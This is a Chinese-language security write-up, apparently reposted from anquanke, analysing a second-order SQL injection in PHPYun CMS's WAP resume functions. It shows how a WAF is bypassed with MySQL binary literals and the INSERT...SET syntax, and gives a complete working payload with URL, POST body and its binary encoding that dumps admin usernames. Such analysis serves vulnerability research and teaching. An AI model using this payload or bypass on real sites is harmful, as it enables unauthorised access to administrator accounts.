一.漏洞說明

這個漏洞涉及到了MySQL中比較有意思的兩個知識點(diǎn)以及以table作為二次注入的突破口，非常的有意思。

此cms的防注入雖然是很變態(tài)的，但是卻可以利用mysql的這兩個特點(diǎn)繞過防御。本次的漏洞是出現(xiàn)在ndex.class.php中的likejob_action()和saveresumeson_action()函數(shù)，由于這兩個函數(shù)對用戶的輸入沒有進(jìn)行嚴(yán)格的顯示，同時利用mysql的特點(diǎn)能夠繞過waf。

PS:此漏洞的觸發(fā)需要在WAP環(huán)境下，所以在進(jìn)行調(diào)試的時候需要修改瀏覽器的ua為Mozilla/5.0 (linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/64.0.3282.186 Mobile Safari/537.36。

二.漏洞分析

mysql特點(diǎn)

特點(diǎn)1

傳統(tǒng)的插入方式可能大家想到的都是insert into test(id,content,title) values(1,'hello','hello')。

如果我們僅僅值需要插入一條記錄，則使用insert into test(content) values('hello2')。

如下圖所示:

但是實(shí)際上還存在另外一種方式能夠僅僅值插入一條記錄。

insert into test set content='hello3';

可以看到這種方式和insert into test(content) values('hello2')是一樣的。

說明插入數(shù)據(jù)時，利用values()和通過=指定列的方式結(jié)果都一樣

特點(diǎn)2

我們知道m(xù)ysql中能夠使用十六進(jìn)制表示字符串。如下：

其中0x68656c6c6f表示的就是hello

這是一個很常見的方式！

除了使用十六進(jìn)制外，還可以使用二進(jìn)制的方式進(jìn)行插入。

hello的二進(jìn)制是01101000 01100101 01101100 01101100 01101111，那么我們的SQL語句還可以這樣寫,insert into test set content=0b0110100001100101011011000110110001101111。

這種方式和insert into test(content) values (0b0110100001100101011011000110110001101111)是一樣的。

mysql不僅可以使用十六進(jìn)制插入，還可以使用二進(jìn)制的方式插入

waf防護(hù)分析

waf的防護(hù)是位于config/db.safety.php

其中的gpc2sql()過濾代碼如下:

function gpc2sql($str, $str2) {    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str)) {        exit(safe_pape());    }    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str2)) {        exit(safe_pape());    }    $arr = array("sleep" => "Ｓleep", " and " => " an d ", " or " => " Ｏr ", "xor" => "xＯr", "%20" => " ", "select" => "Ｓelect", "update" => "Ｕpdate", "count" => "Ｃount", "chr" => "Ｃhr", "truncate" => "Ｔruncate", "union" => "Ｕnion", "delete" => "Ｄelete", "insert" => "Ｉnsert", """ => "“", "'" => "“", "--" => "- -", "(" => "（", ")" => "）", "00000000" => "OOOOOOOO", "0x" => "Ox");    foreach ($arr as $key => $v) {        $str = preg_replace('/' . $key . '/isU', $v, $str);    }    return $str;}

可以看到將0x替換為了Ox,所以無法傳入十六進(jìn)制，但是我們卻可以利用mysql中的二進(jìn)制的特點(diǎn)，利用0b的方式傳入我們需要的payload。

index.class.php漏洞分析

漏洞是位于wap/member/model/index.class.php中，漏洞產(chǎn)生的主要函數(shù)是位于likejob_action()和saveresumeson_action()中。

我們首先分析likejob_action()。

likejob_action()的主要代碼如下：

而DB_update_all()的代碼如下：

function DB_update_all($tablename, $value, $where = 1,$pecial=''){    if($pecial!=$tablename){        $where =$this->site_fetchsql($where,$tablename);    }    $SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE ".$where;    $this->db->query("set sql_mode=''");    $return=$this->db->query($SQL);    return $return;}

也就是說，當(dāng)數(shù)據(jù)進(jìn)入到DB_update_all()之后就不會有任何的過濾。

那么漏洞點(diǎn)就在于resume_expect中的job_classid字段。

job_classid字段的內(nèi)容的傳遞如下圖所示：

所以如如果我們控制了resume_expect中的job_classid字段，我們就能夠修改這條語句了。

我們可以借助于saveresumeson_action()來向job_classid中插入我們的payload。

saveresumeson_action()的關(guān)鍵代碼如下：

可以看到$table是直接通過"resume_".$_POST['table']拼接的，這也就以為著$table是我們可控的，之后$table進(jìn)入了$this->obj->update_once()中。

我們進(jìn)入uptate_once()中：

$table變量在update_once()沒有進(jìn)行任何的處理，直接進(jìn)入到DB_update_all()中，我們追蹤進(jìn)入到DB_update_all()中:

同樣沒有進(jìn)行任何的處理。

通過上面的跟蹤分析，表明$table="resume_".$_POST['table'];賦值之后，中途$table變量沒有進(jìn)行任何的過濾直接進(jìn)入了最終的SQL語句查詢。

如此整個攻擊鏈就成功了，我們通過saveresumeson_action()中的$table可控,對resume_expect中的job_classid進(jìn)行修改，之后通過likejob_action()讀取job_classid字段的內(nèi)容，執(zhí)行我們的SQL語句。

由于我們無法使用十六進(jìn)制，此時我們就需要使用到二進(jìn)制(0b)插入我們的payload。

三.漏洞復(fù)現(xiàn)

注冊用戶/創(chuàng)建簡歷

注冊用戶創(chuàng)建簡歷。

此時在phpyun_resume_expect中存在一條id=1的記錄。

訪問saveresumeson

我們訪問saveresumeson對應(yīng)的URL，寫入我們的payload。根據(jù)語法，我們需要將table的內(nèi)容設(shè)置為

expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #

由于1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #無法繞過SQL的防御，需要轉(zhuǎn)化為二進(jìn)制，是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011

那么最終的payload是:

URL:http://localhost/wap//member/index.php?c=saveresumeson&eid=1POST：name=JAVA%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23

此時我們執(zhí)行的SQL語句是:

INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET

最終數(shù)據(jù)庫中多了一條記錄，如下：

我們順利地向job_classid中插入了我們的的payload

訪問likejob_action觸發(fā)payload

接下來我們訪問http://localhost/member/index.php?c=likejob&id=7，其中的id就是剛剛我們插入的payload所對應(yīng)記錄的id。

當(dāng)運(yùn)行至DB_select_all()中執(zhí)行的SQL語句是：

為了便于分析，我們將這條SQL語句放入到datagrid中分析:

最終在頁面上顯示admin的信息。

至此整個漏洞都分析完畢了。

四.總結(jié)

一般來說，二次注入利用點(diǎn)一般都比較隱晦。

所以二次注入的思路比一般的注入更加巧妙和有意思，在本例中體現(xiàn)得尤為明顯。

1.這個二次注入的點(diǎn)比較難找，二次注入中的利用table作為二次注入的利用點(diǎn)的例子還是比較少見的；

2.繞過方法也比較少見。本例中的waf的防護(hù)還是比較嚴(yán)格的，利用了mysql的兩個少見特性就可以繞過了。

作者:天王蓋地虎 轉(zhuǎn)載自https://www.anquanke.com/post/id/170845